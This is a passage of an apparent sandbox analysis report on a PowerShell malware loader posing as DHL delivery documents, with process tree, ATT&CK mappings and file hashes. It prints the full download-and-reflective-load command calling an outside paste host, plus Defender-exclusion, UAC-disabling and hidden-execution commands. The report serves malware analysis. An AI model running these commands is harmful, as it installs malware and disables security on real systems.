[System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$hdvzj = ('https://www.pastery.net/rdakwa/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$TWzsU = $webClient.DownloadString( $hdvzj ) ;$Stringbase = $TWzsU; $TWzsU = BaseMy;$TWzsU | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$PeMzb = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$kMFIR = New-Object System.Net.WebClient ;$kMFIR.Encoding = [System.Text.Encoding]::UTF8 ;$IPgJD = ( Get-Content -Path $cZNqf ) ;$TlTKl = $kMFIR.DownloadData( $IPgJD ) ;$SkzeD = [System.Text.Encoding]::UTF8.GetString($TlTKl);$SkzeD | Out-File -FilePath $PeMzb -force ;$REyyw = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$REyyw += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$REyyw += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$REyyw += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$REyyw += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''nib.smrafmaerts/segami/moc.tithgisnihtworg//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_pdf.vbs'' , ''D D1Dc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$REyyw | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\Admin\AppData\Local\Temp\DLL01.txt"
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2304
            • C:\Windows\system32\PING.EXE
              ping 127.0.0.1 -n 1
              6⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:4144
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\Admin\AppData\Local\Temp\DLL02.txt"
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2452
            • C:\Windows\system32\PING.EXE
              ping 127.0.0.1 -n 1
              6⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2952
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\Admin\AppData\Local\Temp\DLL31.ps1"
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:4748
            • C:\Windows\system32\PING.EXE
              ping 127.0.0.1 -n 1
              6⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:4620
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
            5⤵
              PID:3552
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $S = 'C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:400
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3772
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /k reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4284
              • C:\Windows\system32\reg.exe
                reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                6⤵
                • UAC bypass
                • Modifies registry key
                PID:4592
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\hmpht.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:4484
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\hmpht.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1056
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\hmpht.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4620
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:4920
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2728
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4996
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\luwne.ps1"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2596
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\uwsqd.ps1"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3776
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2472
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1404
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1776
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3580
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5032
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4604
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:828
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:760
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1688
              • \??\c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
                #by-unknown
                6⤵
                  PID:976
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_pdf.vbs"
                5⤵
                  PID:1436

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Privilege Escalation

        Abuse Elevation Control Mechanism

        1
        T1548

        Bypass User Account Control

        1
        T1548.002

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Defense Evasion

        Abuse Elevation Control Mechanism

        1
        T1548

        Bypass User Account Control

        1
        T1548.002

        Hide Artifacts

        1
        T1564

        Hidden Window

        1
        T1564.003

        Impair Defenses

        1
        T1562

        Disable or Modify Tools

        1
        T1562.001

        Indicator Removal

        1
        T1070

        File Deletion

        1
        T1070.004

        Modify Registry

        3
        T1112

        Credential Access

        Discovery

        Query Registry

        1
        T1012

        Remote System Discovery

        1
        T1018

        System Information Discovery

        2
        T1082

        System Network Configuration Discovery

        1
        T1016

        Internet Connection Discovery

        1
        T1016.001

        Lateral Movement

        Collection

        Command and Control

        Web Service

        1
        T1102

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\hmpht.ps1
          Filesize

          432B

          MD5

          8b27d20313e042eb053f98cfa5e3cb6e

          SHA1

          652121975c6e235e7f846a801904b1f33ab37297

          SHA256

          6b9cafdc2aca58065081d6b2591f17734ca24a2762b77c6c642284ab88af2709

          SHA512

          6eecaadeb529c4bb4ed58b38440d4daf9bf572f2d41d24b4da6bdcffe19cadf413b05ea92e5a5aa04c1532f690a75212a2c93d99d0003fa5335c59cbe80d8b75

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\luwne.ps1
          Filesize

          213KB

          MD5

          3c7cea596704106858bb5dc1d3a05d87

          SHA1

          4e4dc571a3175ed2d76c0921dd0ff5ea9eee08f2

          SHA256

          b0f6e6dfdd08b69bc3c6c05c92bd4e0efbb5e8e501026f6165e8a0672b8866c8

          SHA512

          8be329c571f8a66c91b3e6af0bf51112d4196150c97eb69534e65a6bcc75be93686c9c2602327b6627faa45b430f5ba1e7fbb1ab8d7f6fc3622c335abddf1d0c

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\pvbua.ps1
          Filesize

          437B

          MD5

          7a89f3af3d2127475350a816b6c95ae8

          SHA1

          1502e26078e599561d9e4329e014fd244a41dc77

          SHA256

          72a84238e456e3d7f4bb215fc96a518aa37a257946992a0b6ee3fc46fcbcdb12

          SHA512

          e64fa5a9a9be7c48ff3a5afc4c322b5fef8d80d242b6ac906e1a03190ef2e07d3c78bdc05b75e77dd88104ce35f5436eac39448280a2bad0608c64a5c44df822

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\uwsqd.ps1
          Filesize

          237B

          MD5

          c5037fdb930950210891bd9fa7572bf0

          SHA1

          f7dbfe484147489f63385ae4efb34a4fe8615316

          SHA256

          0cd5c8a5109ee51f23d50aee273f72b02c9ee9b4ca2abc6749856a80382f88c2

          SHA512

          992ebdd6367550126f2571fb3e8f7c95828413053822f3681172a06a98f69ea531f1a532a6eda2300114c3870ad7514994ec0d4b2d621d478c93fce82b144e6f

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          5caad758326454b5788ec35315c4c304

          SHA1

          3aef8dba8042662a7fcf97e51047dc636b4d4724

          SHA256

          83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

          SHA512

          4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          1bad2704664b4c1a190586ec492be65f

          SHA1

          1c98e6645c66774152c184d23f7a3178ce522e7b

          SHA256

          5950586396814b38bfdbb86757839fc8c7ce3eb73577775473c29ce6be81fe3e

          SHA512

          668553c12f1e5560baba826d5c8b139d7c7e323b6aa4e3723aaca479850f898c147d63cb77d305d715044db1e75cf501d6502ca214c7ed05ded424b230893bb0

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          04c9ebf9c23c1d4d4a08c16e20fcceed

          SHA1

          67044e3f04584acefef2e09c2584e22e70fc5df4

          SHA256

          5ba65623b2739407ddd1fa8d75335ee54a3575893bc6a226182972c1ef881e58

          SHA512

          84cf13081ef3162995557677cfdae002ab7af81cf53ca874fbb046aa26facc375f8b533e6d2899240b3bdb06d26c6b322b60c4eca9a2a9570c54ba6d0350cd69

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          3db5a3b556b01c59c5812cb86abb674e

          SHA1

          3848e5419d5c47879f159247e4f1b08005674cf0

          SHA256

          218d487f881ce9640acd16f7476b445471b83671569e99973f77d0bbf6c42ffa

          SHA512

          3eb6575d3e476053a65b2631b0cd0d584056ca476058ee2706c69fe10b0502460c40f8985f1f4666e42fba2809924f6dc34ba2e9b2629217542e45cb3640adcd

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          7224298af316ab030a6ea7b29e69915d

          SHA1

          c73b3f8af0647472461d4746f9edf2153b754bd0

          SHA256

          c869d981719dc133b2e2dba5cfc9925ce9b327dbf079a18b8b6caa77716e1f87

          SHA512

          5ae6512f693439759dfc913af7db37395fba2216c1b87bf5b6788a39f01a7c22f6daac0c2ccb680c552d431ed5806a344358a2e1856045a2efad43f0059ad099

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          e89e47688c3779545d80ee22d365b25d

          SHA1

          6727b4dc28b3299596617a798ff935bf56bfe499

          SHA256

          c50db088a82cda38d32e2cdb5dae74404413a9c1aaa487e02a83cfd5cd2c17f4

          SHA512

          d32ba781b28b21e70fea3e1934fd9a6d45d6a9724c72f9beeb8c445ffe8a94aad370456b61150e9bc4c51a5796c048e77d556ec0b30b21a02bdd5bd78b0c06ff

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          1536159346e9a2061e905bb38ac9fd35

          SHA1

          eff17db4721dc0add117ed399b839130d27675d4

          SHA256

          6b0eebfc544130c7a8f7d0e45c8e0b86748c13b528bc9948f216a76d8be2b88f

          SHA512

          fab6f66ac2bc68e2a82199da2519c7aae2d629603450175b69336097111e57f49fbea8b3903f7a106150032d8e5c653a90f681a10d7be668bff2bcdb798eb4ee

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          693baf43e3d5fefa0883380c7a77c69a

          SHA1

          f3e6115432504e8bd401d8c0ff2da43e708707e5

          SHA256

          27a3015931d1f72ce982cf8f9d38dc99219ea2bb9bda4ec7b09dca9bd1122e9e

          SHA512

          29c5e093f3f86c38246fe5f1c5d6110f315937916f139289f52dbbb1e67d4f5f46e4cc928ff03ce19b91cf1d8310d40dadc65812399829da8c94f0c6f9e3f5cc

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          ac3bf9756600f6c31a15240716e6e7c6

          SHA1

          521aa76b55f74cafd1b579933dc0fae439acb0f5

          SHA256

          f7bc65b2962543bb5165f2b1bb6b3390ed3b55801475b2fd7701129cc8a081fd

          SHA512

          96ae0dddaeadae05fed313707076af5d443d328d2ea8524aa283812591b615b596a0aab1d2918471aba59f5546cebca7521bd2003db63a24f548899bee5fa67a

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          d49246229b2077d7961ee5c90e0945f8

          SHA1

          8b50bbdbc82b00f545510bc3ea9e8cd96182fa79

          SHA256

          581ef2752ddb123bff535eebcf573a4783ada1f4b7f7250c4145902a2de5dd8c

          SHA512

          5069555ffc7a217c703186559ed399e5fd8e787443be1d6bf9b6b96faca2565fb1c898422bdde51aadd6359ebf65ae40d4509b2829c5f6bb64d597b3b4763148

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          a68fcc3482ebb381cd7eb80d4dfc7ac9

          SHA1

          68f694b1b7999996678244d8ef9d95f520ec2e39

          SHA256

          1bfbb143c70207d28f8266d08a28e052467ad0eab48c65c19ba8636d44093ea0

          SHA512

          a8a5cc66e81ebb417dcd216541690a31913f8a9cbe676b76ac451c009540ef33558dba762da1736c0f61fb36dfaa71f0926ac1ab8919a892a8ab49087999a2d8

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          77d622bb1a5b250869a3238b9bc1402b

          SHA1

          d47f4003c2554b9dfc4c16f22460b331886b191b

          SHA256

          f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

          SHA512

          d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          d8b9a260789a22d72263ef3bb119108c

          SHA1

          376a9bd48726f422679f2cd65003442c0b6f6dd5

          SHA256

          d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

          SHA512

          550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          63f3daf3ebf7daaa3416a431d50ff3b2

          SHA1

          cd95e25992a7da97a5cc8b48a47e157867721a04

          SHA256

          21927689c7ecab2b7af7611474c2e2b20d72d05a941afec01b42337f432dc2fa

          SHA512

          9f6e37a407af1b6fdeaa89f8753b5b7db087c32b3f9b2b2bd7af027ec3606ab534ad7dc16e179e3e784c04af27cd77befd45d4ef68c2d1af09830b311177f29f

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          948B

          MD5

          726aa601c9849abb13db145101d49983

          SHA1

          16a700814154dc40e5ed2a594a56981f0db1e9e2

          SHA256

          1ce61179899cbad68ae358a04f43020aee038a2fde601155f31efd57cfd8b793

          SHA512

          8858793a9d550403a680184129151cb2fcc9b56180811be3cdeb4108ce9ecf65de2e6c3f3edd2cd90ce7d33bd44ee7b219585d4ed98ac1ebd287c8d9e4cf1f6a

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cdkyjvfv.bsz.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\dll01.txt
          Filesize

          34B

          MD5

          3a54a7249d169ee6d6425beff939e129

          SHA1

          e253197ef68c0ab01e9ca788d5417a2aa823e102

          SHA256

          ee2568c1796417f2782d2eb3b49d6e0072ca038aa063fc88c54d31308a2ef4dd

          SHA512

          d71e47b4093064f6e9167ffb0cb0ef2aec29c93b94ca1438c3d01008b0c40526cddd8a2d95a4e0fc4401c6b4d2dde53658c75806b4b155611ae4bd5dc5f08b6c

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\dll02.txt
          Filesize

          71KB

          MD5

          b5c7d84fb855ddfafda03af292f19e2f

          SHA1

          d7f931aeb01e721f4bdb7874cd864eb0a13eb577

          SHA256

          5f4ab753ee81c5b66db0bc7987554a109cd9c9968da7dc3396b7b87f59a63464

          SHA512

          8666b2374bdb4f8678efa4406b80bd4db0e69ac1850983c21bd7106a7e640f01b00ea8e74f9caee16f9025f0932fd9676933daaae97d9f589bffb795baf332ed

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\dll03.ps1
          Filesize

          1KB

          MD5

          4a105a6ce6fef2520a775e37990fe8ce

          SHA1

          cb64542b28625cc9641d223820ace159d8b5f0c2

          SHA256

          8e4341f8a897ed6988a46708d2a765fb0ac317e409d55fd0e390e4c74513eef6

          SHA512

          aca9333613be12dd3dc04689e501aa2e22b647ea2f15598439910f983a55f9aafcde8fb93093c0c8f46a006f276a723b997f04cce5bca29df608c125f06ee815

          Download Submit

        • memory/976-115-0x0000000000400000-0x0000000000410000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1608-37-0x000001BBB1C10000-0x000001BBB1C1A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/2596-103-0x000001D659730000-0x000001D65973A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/3140-87-0x00007FFBD7890000-0x00007FFBD8351000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3140-0-0x00007FFBD7893000-0x00007FFBD7895000-memory.dmp

          Filesize

          8KB

          Download

